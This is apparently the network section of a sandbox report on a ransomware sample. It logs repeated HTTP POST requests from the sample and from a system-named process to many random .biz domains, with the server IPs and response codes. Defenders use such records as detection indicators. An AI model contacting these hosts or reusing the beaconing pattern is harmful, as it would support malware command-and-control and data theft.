http://warkcdu.biz/pfljpexr

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://warkcdu.biz/pfljpexr

HTTP Response

200
54.80.154.23:80

http://gnqgo.biz/iprryxanoiwyt

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://gnqgo.biz/iprryxanoiwyt

HTTP Response

200
3.237.86.197:80

http://jhvzpcfg.biz/nikqkptv

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
668 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/nikqkptv

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/bfgxeiyubdkaklo

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://acwjcqqv.biz/bfgxeiyubdkaklo

HTTP Response

200
13.251.16.150:80

http://gcedd.biz/smjxwgwfacke

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://gcedd.biz/smjxwgwfacke

HTTP Response

200
44.213.104.86:80

http://vyome.biz/qvpwuopvx

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://vyome.biz/qvpwuopvx

HTTP Response

200
54.80.154.23:80

http://yauexmxk.biz/mygqtubwufdjog

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://yauexmxk.biz/mygqtubwufdjog

HTTP Response

200
18.208.156.248:80

http://jwkoeoqns.biz/idbwn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://jwkoeoqns.biz/idbwn

HTTP Response

200
13.251.16.150:80

http://iuzpxe.biz/ntpfmbdbyvpldea

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://iuzpxe.biz/ntpfmbdbyvpldea

HTTP Response

200
44.213.104.86:80

http://xccjj.biz/vaweoxamxqsk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://xccjj.biz/vaweoxamxqsk

HTTP Response

200
44.221.84.105:80

http://hehckyov.biz/bspwawm

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://hehckyov.biz/bspwawm

HTTP Response

200
54.244.188.177:80

http://rynmcq.biz/xvxpycxvgyqor

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://rynmcq.biz/xvxpycxvgyqor

HTTP Response

200
13.251.16.150:80

http://sxmiywsfv.biz/xmlvemwvsslphpc

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.6kB
669 B
6
6

HTTP Request

POST http://sxmiywsfv.biz/xmlvemwvsslphpc

HTTP Response

200
3.254.94.185:80

http://uaafd.biz/urwftnsbgslpa

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
705 B
7
7

HTTP Request

POST http://uaafd.biz/urwftnsbgslpa

HTTP Response

200
18.141.10.107:80

http://eufxebus.biz/slpefmfj

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://eufxebus.biz/slpefmfj

HTTP Response

200
34.211.97.45:80

http://vrrazpdh.biz/bfbgwfwrmpabfcl

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://vrrazpdh.biz/bfbgwfwrmpabfcl

HTTP Response

200
34.246.200.160:80

http://pwlqfu.biz/ownrnyijt

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://pwlqfu.biz/ownrnyijt

HTTP Response

200
34.218.204.173:80

http://ftxlah.biz/hlkcaclmcip

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://ftxlah.biz/hlkcaclmcip

HTTP Response

200
44.200.43.61:80

http://rrqafepng.biz/tjxr

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://rrqafepng.biz/tjxr

HTTP Response

200
3.94.10.34:80

http://ctdtgwag.biz/k

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://ctdtgwag.biz/k

HTTP Response

200
13.251.16.150:80

http://typgfhb.biz/wojkcnhqdkk

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://typgfhb.biz/wojkcnhqdkk

HTTP Response

200
35.164.78.200:80

http://tnevuluw.biz/iilnkojvljvy

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://tnevuluw.biz/iilnkojvljvy

HTTP Response

200
18.141.10.107:80

http://whjovd.biz/xekdmafallia

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://whjovd.biz/xekdmafallia

HTTP Response

200
34.211.97.45:80

http://esuzf.biz/hafbugblphy

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://esuzf.biz/hafbugblphy

HTTP Response

200
3.94.10.34:80

http://gvijgjwkh.biz/oym

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
669 B
6
6

HTTP Request

POST http://gvijgjwkh.biz/oym

HTTP Response

200
44.213.104.86:80

http://qpnczch.biz/mlfaipldvyqnbkv

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://qpnczch.biz/mlfaipldvyqnbkv

HTTP Response

200
3.237.86.197:80

http://reczwga.biz/ukrmgkkfrgcjn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://reczwga.biz/ukrmgkkfrgcjn

HTTP Response

200
3.254.94.185:80

http://brsua.biz/ipahc

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://brsua.biz/ipahc

HTTP Response

200
34.211.97.45:80

http://bghjpy.biz/aekfxjvn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://bghjpy.biz/aekfxjvn

HTTP Response

200
85.214.228.140:80

http://dlynankz.biz/n

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
378 B
5
5

HTTP Request

POST http://dlynankz.biz/n

HTTP Response

404
44.200.43.61:80

http://oflybfv.biz/aybcqpysh

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://oflybfv.biz/aybcqpysh

HTTP Response

200
54.80.154.23:80

http://damcprvgv.biz/frtb

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://damcprvgv.biz/frtb

HTTP Response

200
34.211.97.45:80

http://yhqqc.biz/rlvfr

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://yhqqc.biz/rlvfr

HTTP Response

200
3.254.94.185:80

http://ocsvqjg.biz/defbnmeqecjkmjm

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://ocsvqjg.biz/defbnmeqecjkmjm

HTTP Response

200
54.244.188.177:80

http://ywffr.biz/yhhihx

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://ywffr.biz/yhhihx

HTTP Response

200
44.200.43.61:80

http://mnjmhp.biz/hhunm

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://mnjmhp.biz/hhunm

HTTP Response

200
18.208.156.248:80

http://opowhhece.biz/q

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
669 B
6
6

HTTP Request

POST http://opowhhece.biz/q

HTTP Response

200
54.244.188.177:80

http://ecxbwt.biz/qhl

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
666 B
6
6

HTTP Request

POST http://ecxbwt.biz/qhl

HTTP Response

200
13.251.16.150:80

http://jdhhbs.biz/fuwjpxefqbbqjmjh

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://jdhhbs.biz/fuwjpxefqbbqjmjh

HTTP Response

200
44.213.104.86:80

http://pectx.biz/rem

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://pectx.biz/rem

HTTP Response

200
54.80.154.23:80

http://zyiexezl.biz/iqgplaixgknxrgd

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://zyiexezl.biz/iqgplaixgknxrgd

HTTP Response

200
3.237.86.197:80

http://banwyw.biz/djkxmsqk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://banwyw.biz/djkxmsqk

HTTP Response

200
34.246.200.160:80

http://mgmsclkyu.biz/bh

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
669 B
6
6

HTTP Request

POST http://mgmsclkyu.biz/bh

HTTP Response

200
3.237.86.197:80

http://zrlssa.biz/lkoajbrr

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://zrlssa.biz/lkoajbrr

HTTP Response

200
18.141.10.107:80

http://warkcdu.biz/gsnwjbanfgexf

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://warkcdu.biz/gsnwjbanfgexf

HTTP Response

200
18.141.10.107:80

http://jlqltsjvh.biz/jdg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://jlqltsjvh.biz/jdg

HTTP Response

200
13.251.16.150:80

http://gcedd.biz/b

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://gcedd.biz/b

HTTP Response

200
54.80.154.23:80

http://xyrgy.biz/fiwn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://xyrgy.biz/fiwn

HTTP Response

200
44.208.124.139:80

http://htwqzczce.biz/amstwqsytpj

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
172 B
4
4

HTTP Request

POST http://htwqzczce.biz/amstwqsytpj
44.208.124.139:80

http://htwqzczce.biz/tfjpa

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
172 B
4
4

HTTP Request

POST http://htwqzczce.biz/tfjpa
54.244.188.177:80

http://kvbjaur.biz/ogch

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://kvbjaur.biz/ogch

HTTP Response

200
18.208.156.248:80

http://jwkoeoqns.biz/em

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
669 B
6
6

HTTP Request

POST http://jwkoeoqns.biz/em

HTTP Response

200
44.213.104.86:80

http://xccjj.biz/jfnpesnlhlqmu

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://xccjj.biz/jfnpesnlhlqmu

HTTP Response

200
44.221.84.105:80

http://uphca.biz/ntlegpblxuknqmv

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://uphca.biz/ntlegpblxuknqmv

HTTP Response

200
44.221.84.105:80

http://hehckyov.biz/fciw

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://hehckyov.biz/fciw

HTTP Response

200
34.211.97.45:80

http://fjumtfnz.biz/jqhdai

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://fjumtfnz.biz/jqhdai

HTTP Response

200
54.244.188.177:80

http://rynmcq.biz/kvtwjctltflmkpp

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://rynmcq.biz/kvtwjctltflmkpp

HTTP Response

200
34.211.97.45:80

http://hlzfuyy.biz/lkcithrucnqqtmic

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://hlzfuyy.biz/lkcithrucnqqtmic

HTTP Response

200
3.254.94.185:80

http://uaafd.biz/rmubpo

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://uaafd.biz/rmubpo

HTTP Response

200
107.178.223.183:80

http://eufxebus.biz/p

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
290 B
6
6

HTTP Request

POST http://eufxebus.biz/p

HTTP Response

200
34.246.200.160:80

http://rffxu.biz/lcjiuyiv

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://rffxu.biz/lcjiuyiv

HTTP Response

200
44.213.104.86:80

http://cikivjto.biz/qvb

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://cikivjto.biz/qvb

HTTP Response

200
34.218.204.173:80

http://qncdaagct.biz/hbvlopxsdopapmg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://qncdaagct.biz/hbvlopxsdopapmg

HTTP Response

200
13.251.16.150:80

http://shpwbsrw.biz/gpxarmmnshx

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://shpwbsrw.biz/gpxarmmnshx

HTTP Response

200
54.80.154.23:80

http://cjvgcl.biz/apqkcmmypmyevsg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://cjvgcl.biz/apqkcmmypmyevsg

HTTP Response

200
3.237.86.197:80

http://neazudmrq.biz/nivorgwre

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://neazudmrq.biz/nivorgwre

HTTP Response

200
54.80.154.23:80

http://pgfsvwx.biz/bmrvmxjixneixwym

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://pgfsvwx.biz/bmrvmxjixneixwym

HTTP Response

200
34.218.204.173:80

http://aatcwo.biz/chjrewmnjfqktvdo

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://aatcwo.biz/chjrewmnjfqktvdo

HTTP Response

200
18.208.156.248:80

http://kcyvxytog.biz/iulohcbbyxgf

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://kcyvxytog.biz/iulohcbbyxgf

HTTP Response

200
54.244.188.177:80

http://nwdnxrd.biz/osir

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://nwdnxrd.biz/osir

HTTP Response

200
44.213.104.86:80

http://ereplfx.biz/eohh

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://ereplfx.biz/eohh

HTTP Response

200
18.141.10.107:80

http://ptrim.biz/ssdnnjxbkrt

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://ptrim.biz/ssdnnjxbkrt

HTTP Response

200
34.218.204.173:80

http://znwbniskf.biz/ibnm

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://znwbniskf.biz/ibnm

HTTP Response

200
3.237.86.197:80

http://cpclnad.biz/jxvyh

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://cpclnad.biz/jxvyh

HTTP Response

200
3.237.86.197:80

http://mjheo.biz/fuqfinxkqnac

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://mjheo.biz/fuqfinxkqnac

HTTP Response

200
34.246.200.160:80

http://pwlqfu.biz/bicnqonoen

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://pwlqfu.biz/bicnqonoen

HTTP Response

200
18.141.10.107:80

http://wluwplyh.biz/kncftek

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://wluwplyh.biz/kncftek

HTTP Response

200
44.200.43.61:80

http://rrqafepng.biz/knwrrh

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://rrqafepng.biz/knwrrh

HTTP Response

200
3.94.10.34:80

http://ctdtgwag.biz/p

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://ctdtgwag.biz/p

HTTP Response

200
35.164.78.200:80

http://tnevuluw.biz/yilsagvrjchdbotq

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.6kB
668 B
6
6

HTTP Request

POST http://tnevuluw.biz/yilsagvrjchdbotq

HTTP Response

200
18.141.10.107:80

http://whjovd.biz/piwlsftkhciin

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://whjovd.biz/piwlsftkhciin

HTTP Response

200
18.208.156.248:80

http://zgapiej.biz/lq

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://zgapiej.biz/lq

HTTP Response

200
44.221.84.105:80

http://jifai.biz/fqfevknjdmjh

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://jifai.biz/fqfevknjdmjh

HTTP Response

200
107.178.223.183:80

http://xnxvnn.biz/snh

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
290 B
6
6

HTTP Request

POST http://xnxvnn.biz/snh

HTTP Response

200
35.164.78.200:80

http://ihcnogskt.biz/fitew

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://ihcnogskt.biz/fitew

HTTP Response

200
18.141.10.107:80

http://kkqypycm.biz/lpdabysfoouotoef

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://kkqypycm.biz/lpdabysfoouotoef

HTTP Response

200
3.237.86.197:80

http://reczwga.biz/ek

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://reczwga.biz/ek

HTTP Response

200
34.211.97.45:80

http://bghjpy.biz/jerkgcqqbarnt

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://bghjpy.biz/jerkgcqqbarnt

HTTP Response

200
54.80.154.23:80

http://damcprvgv.biz/qvyki

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://damcprvgv.biz/qvyki

HTTP Response

200
3.254.94.185:80

http://ocsvqjg.biz/kopnkrrvslxpxxl

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://ocsvqjg.biz/kopnkrrvslxpxxl

HTTP Response

200
44.213.104.86:80

http://uevrpr.biz/qqqgar

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://uevrpr.biz/qqqgar

HTTP Response

200
54.244.188.177:80

http://ywffr.biz/jlnqudg

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://ywffr.biz/jlnqudg

HTTP Response

200
34.211.97.45:80

http://fgajqjyhr.biz/kjhddwmawdkrlvhw

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://fgajqjyhr.biz/kjhddwmawdkrlvhw

HTTP Response

200
54.244.188.177:80

http://ecxbwt.biz/yhmgpoc

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://ecxbwt.biz/yhmgpoc

HTTP Response

200
18.208.156.248:80

http://hagujcj.biz/uqldvvksuulw

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://hagujcj.biz/uqldvvksuulw

HTTP Response

200
35.164.78.200:80

http://sctmku.biz/pug

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
666 B
6
6

HTTP Request

POST http://sctmku.biz/pug

HTTP Response

200
44.213.104.86:80

http://pectx.biz/habgqysxqvqaivx

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://pectx.biz/habgqysxqvqaivx

HTTP Response

200
54.80.154.23:80

http://zyiexezl.biz/aarjmedjtq

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://zyiexezl.biz/aarjmedjtq

HTTP Response

200
34.211.97.45:80

http://qcrsp.biz/rjhu

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://qcrsp.biz/rjhu

HTTP Response

200
3.237.86.197:80

http://banwyw.biz/a

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://banwyw.biz/a

HTTP Response

200
3.237.86.197:80

http://zrlssa.biz/br

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
666 B
6
6

HTTP Request

POST http://zrlssa.biz/br

HTTP Response

200
3.237.86.197:80

http://sewlqwcd.biz/wxqrepjouowdlosl

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://sewlqwcd.biz/wxqrepjouowdlosl

HTTP Response

200
18.141.10.107:80

http://jlqltsjvh.biz/gdqigngssjsdj

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://jlqltsjvh.biz/gdqigngssjsdj

HTTP Response

200
54.244.188.177:80

http://dyjdrp.biz/nklneifcvweg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://dyjdrp.biz/nklneifcvweg

HTTP Response

200
35.164.78.200:80

http://napws.biz/mqnkimt

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://napws.biz/mqnkimt

HTTP Response

200
54.244.188.177:80

http://qvuhsaqa.biz/nnovsrxy

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://qvuhsaqa.biz/nnovsrxy

HTTP Response

200
54.80.154.23:80

http://xyrgy.biz/lfl

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://xyrgy.biz/lfl

HTTP Response

200
44.208.124.139:80

http://htwqzczce.biz/qqeorfjsqwbjca

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.6kB
172 B
6
4

HTTP Request

POST http://htwqzczce.biz/qqeorfjsqwbjca
34.211.97.45:80

http://apzzls.biz/tbxr

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
666 B
6
6

HTTP Request

POST http://apzzls.biz/tbxr

HTTP Response

200
34.218.204.173:80

http://krnsmlmvd.biz/kbckoukfijblgsec

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://krnsmlmvd.biz/kbckoukfijblgsec

HTTP Response

200
54.244.188.177:80

http://nlscndwp.biz/qplhyryrxcqn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://nlscndwp.biz/qplhyryrxcqn

HTTP Response

200
3.94.10.34:80

http://bzkysubds.biz/wdnddwn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://bzkysubds.biz/wdnddwn

HTTP Response

200
54.80.154.23:80

http://ltpqsnu.biz/vbkgmicjwtiswov

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://ltpqsnu.biz/vbkgmicjwtiswov

HTTP Response

200
44.213.104.86:80

http://vnvbt.biz/xsoonblv

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://vnvbt.biz/xsoonblv

HTTP Response

200
3.94.10.34:80

http://ypituyqsq.biz/wplywmhlgcnwyloq

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://ypituyqsq.biz/wplywmhlgcnwyloq

HTTP Response

200
35.164.78.200:80

http://ijnmvqa.biz/sthyqxt

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://ijnmvqa.biz/sthyqxt

HTTP Response

200
54.80.154.23:80

http://tltxn.biz/xi

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://tltxn.biz/xi

HTTP Response

200
44.208.124.139:80

http://htwqzczce.biz/dtjumbugioqybg

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
172 B
4
4

HTTP Request

POST http://htwqzczce.biz/dtjumbugioqybg
54.244.188.177:80

http://vgypotwp.biz/dtjumbugioqybg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://vgypotwp.biz/dtjumbugioqybg

HTTP Response

200
54.244.188.177:80

http://kvbjaur.biz/rxecg

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.6kB
667 B
7
6

HTTP Request

POST http://kvbjaur.biz/rxecg

HTTP Response

200
44.213.104.86:80

http://giliplg.biz/fqkgpgspqwvdkd

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://giliplg.biz/fqkgpgspqwvdkd

HTTP Response

200
54.244.188.177:80

http://pywolwnvd.biz/snfnq

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/snfnq

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/ku

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://ssbzmoy.biz/ku

HTTP Response

200
44.221.84.105:80

http://uphca.biz/lqk

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://uphca.biz/lqk

HTTP Response

200
34.211.97.45:80

http://fjumtfnz.biz/qddyfatykrhmox

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://fjumtfnz.biz/qddyfatykrhmox

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/eucpto

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://cvgrf.biz/eucpto

HTTP Response

200
34.211.97.45:80

http://hlzfuyy.biz/gycoalpdktcnwy

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://hlzfuyy.biz/gycoalpdktcnwy

HTTP Response

200
44.221.84.105:80

http://npukfztj.biz/uxokm

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://npukfztj.biz/uxokm

HTTP Response

200
34.246.200.160:80

http://rffxu.biz/xgnhtjgvps

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
665 B
6
6

HTTP Request

POST http://rffxu.biz/xgnhtjgvps

HTTP Response

200
44.208.124.139:80

http://przvgke.biz/culudnswhdouf

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/culudnswhdouf
44.213.104.86:80

http://cikivjto.biz/vafge

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://cikivjto.biz/vafge

HTTP Response

200
44.208.124.139:80

http://przvgke.biz/lff

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
252 B
6
6

HTTP Request

POST http://przvgke.biz/lff
34.218.204.173:80

http://qncdaagct.biz/qvbngsmdvnpt

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://qncdaagct.biz/qvbngsmdvnpt

HTTP Response

200
18.141.10.107:80

http://knjghuig.biz/ukabixremwjuvnr

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://knjghuig.biz/ukabixremwjuvnr

HTTP Response

200
107.178.223.183:80

http://shpwbsrw.biz/idfgyrdvb

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
132 B
4
3

HTTP Request

POST http://shpwbsrw.biz/idfgyrdvb
82.112.184.197:80

lpuegx.biz

DiagnosticsHub.StandardCollector.Service.exe

156 B
3

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

